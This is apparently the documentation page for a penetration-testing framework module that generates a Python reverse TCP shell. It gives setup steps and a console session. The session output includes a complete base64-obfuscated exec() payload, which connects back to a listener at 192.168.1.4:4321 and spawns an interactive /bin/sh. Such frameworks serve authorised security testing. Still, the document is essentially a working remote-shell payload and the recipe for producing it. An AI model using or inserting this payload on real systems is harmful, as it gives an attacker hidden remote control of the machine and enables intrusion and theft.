## Description Module generates payload that creates interactive tcp reverse shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates python tcp reverse shell payload ## Scenarios ``` rsf > use payloads/python/reverse_tcp rsf (Python Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Python Reverse TCP) > run [*] Running module... [*] Generating payload exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64')) ```